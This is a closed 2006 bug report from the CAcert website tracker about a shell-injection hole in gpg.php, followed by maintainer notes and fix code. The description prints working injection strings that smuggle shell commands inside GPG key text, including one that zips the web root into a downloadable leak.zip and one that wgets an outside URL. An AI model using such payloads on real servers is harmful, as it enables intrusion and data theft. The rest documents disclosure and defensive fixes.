View Issue Details
| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 0000245 | Main CAcert Website | GPG/PGP | public | 2006-05-28 21:15 | 2013-11-20 22:23 |
| Reporter | TheSourcerer | Assigned To | |||
| Priority | normal | Severity | block | Reproducibility | always |
| Status | closed | Resolution | fixed | ||
| Fixed in Version | 2006 | ||||
| Summary | 0000245: Shell escape | ||||
| Description | The following GPG keys can be used to exploit a hole in the system: "; echo "Hi" >/tmp/test ; echo " "; zip -r /www/www/leak.zip /www ; echo " " ; wget http://www2.futureware.at/HoleInOne ; echo " results in the following request: 72.36.210.246 - - [28/May/2006:00:29:34 +0200] "GET /HoleInOne HTTP/1.0" 404 1051 "-" "Wget/1.10.2" The hole is in the www/gpg.php line 45 | ||||
| Tags | No tags attached. | ||||
| Reviewed by | |||||
| Test Instructions | |||||
| related to | 0000148 | closed | site shouldn't rely on magic_quotes_gpc turned on |
This exploit was not possible some weeks ago. Updating PHP might have introduced configuration changes. Seems to me as if magic_quotes_gpc has been turned off (that's the Debian default) or magic_quotes_sybase has been turned on as well (which would break the functionality of magic_quotes_gpc). Possible solution:

1. turn on magic_quotes_gpc in the PHP configuration
2. make sure magic_quotes_sybase is turned off
3. add something like

```php
// Add slashes only when magic_quotes_gpc has not already done so
function check_quotes($value)
{
    return ((!get_magic_quotes_gpc()) ? addslashes($value) : $value);
}
```
Line 44 actually... - $gpgkey = $_POST['CSR']; + $gpgkey = escapeshellarg($_POST['CSR']);
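Review bot: the `+` line applies escapeshellarg() to the raw `$_POST['CSR']` value and so ignores the magic_quotes_gpc point raised in the previous note: when magic_quotes_gpc is on, the POST value already carries added backslashes, and those backslashes would then be escaped a second time and handed to gpg inside the key text. Run stripslashes() on the value before escaping it, and confirm how gpg.php actually consumes `$gpgkey`, because escapeshellarg() wraps the whole multi-line armored block in single quotes as one shell argument, which only helps if the value is used as a single command-line argument.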
escapeshellarg breaks gpg keys, instead a new function was created to only allow base64 chars...

```php
// Strip everything except the characters that can appear in an ASCII-armored key
function clean_csr($CSR)
{
    return(preg_replace("/[^A-Za-z0-9\n\r\-\:\=\+\/ ]/","",$CSR));
}

$gpgkey = clean_csr(stripslashes($_REQUEST['CSR']));
```
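The whitelist fix in the note above, worked through as an added example that is not CAcert's own gpg.php code: it applies the same character whitelist to a constructed armor-shaped block carrying the kind of shell metacharacters the report shows, adds a structural check so a mangled block is rejected rather than silently passed on, and shows the approach that removes the shell from the picture entirely by feeding the key to gpg on stdin through proc_open() with an argument array (PHP 7.4 or later). Function names, the `$homedir` parameter and the sample input are assumptions; `import_key_via_stdin()` needs a gpg binary and is defined but not invoked in the demo.

```php
<?php
// Added example (not CAcert's gpg.php): the whitelist idea from note 0000236
// beside two further defensive measures. Names below are assumptions.

// Allow only characters that occur in an ASCII-armored PGP block: base64
// alphabet, '=' padding, armor-header dashes and colons, spaces and newlines.
function clean_csr_whitelist(string $csr): string
{
    return preg_replace('/[^A-Za-z0-9\n\r\-:=+\/ ]/', '', $csr);
}

// Defence in depth: refuse anything that does not look like an armored public
// key block, instead of silently stripping characters and handing gpg junk.
function looks_like_armored_key(string $csr): bool
{
    return (bool) preg_match(
        '/^-----BEGIN PGP PUBLIC KEY BLOCK-----\r?\n[\s\S]*?-----END PGP PUBLIC KEY BLOCK-----\s*$/',
        $csr
    );
}

// Safest option: never build a shell command line from user data at all.
// The key goes to gpg on stdin; passing the command as an array means no shell
// parses it, so ';', quotes or redirections in the key text are just bytes.
function import_key_via_stdin(string $csr, string $homedir): array
{
    $cmd  = ['gpg', '--batch', '--homedir', $homedir, '--import'];
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        return ['status' => -1, 'stdout' => '', 'stderr' => 'proc_open failed'];
    }
    fwrite($pipes[0], $csr);
    fclose($pipes[0]);
    $stdout = stream_get_contents($pipes[1]);
    $stderr = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return ['status' => proc_close($proc), 'stdout' => $stdout, 'stderr' => $stderr];
}

// Constructed input (not a real key): an armor-shaped block whose Version
// header smuggles the ';'-separated commands and '>' redirection style seen in
// the report. In the historical code this string was interpolated into a shell
// command line, which is exactly what the two measures above avoid.
$hostile = "-----BEGIN PGP PUBLIC KEY BLOCK-----\n"
         . "Version: Example \"; echo hi >/tmp/test ; echo \"\n\n"
         . "mQENBEexample==\n=AbCd\n"
         . "-----END PGP PUBLIC KEY BLOCK-----\n";

$cleaned = clean_csr_whitelist($hostile);

// Quotes, '>' and ';' are gone; letters, digits, '-', ':', '=', '/' and
// whitespace survive, so the armor structure is still recognisable.
$metacharsGone = strpos($cleaned, ';') === false
              && strpos($cleaned, '"') === false
              && strpos($cleaned, '>') === false;
printf("metacharacters removed: %s\n", $metacharsGone ? 'yes' : 'no');
printf("still looks like an armored key: %s\n", looks_like_armored_key($cleaned) ? 'yes' : 'no');
echo $cleaned;
```

The whitelist alone keeps the site's original contract (a string that later becomes part of a command), which is why the structural check matters: stripping characters from a block that was never a key leaves a string gpg will reject, and rejecting it up front gives a clear error instead of an odd gpg failure. Where the code base can be changed more deeply, `import_key_via_stdin()` is the preferable shape, since no filtering of the key text is needed when the text never reaches a shell.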
| Date Modified | Username | Field | Change |
|---|---|---|---|
| 2006-05-28 21:15 | TheSourcerer | New Issue | |
| 2006-05-28 21:51 | | Relationship added | related to 0000148 |
| 2006-05-28 22:06 | | Note Added: 0000234 | |
| 2006-05-28 23:13 | duane | Note Added: 0000235 | |
| 2006-05-28 23:55 | duane | Note Added: 0000236 | |
| 2006-05-28 23:56 | duane | Status | new => closed |
| 2006-05-28 23:56 | duane | Resolution | open => fixed |
| 2006-05-28 23:56 | duane | Fixed in Version | => production |
| 2006-05-29 00:03 | duane | Note Edited: 0000236 | |
| 2013-01-14 08:46 | Werner Dworak | Fixed in Version | => 2006 |
| 2013-11-20 22:23 | NEOatNHNG | View Status | private => public |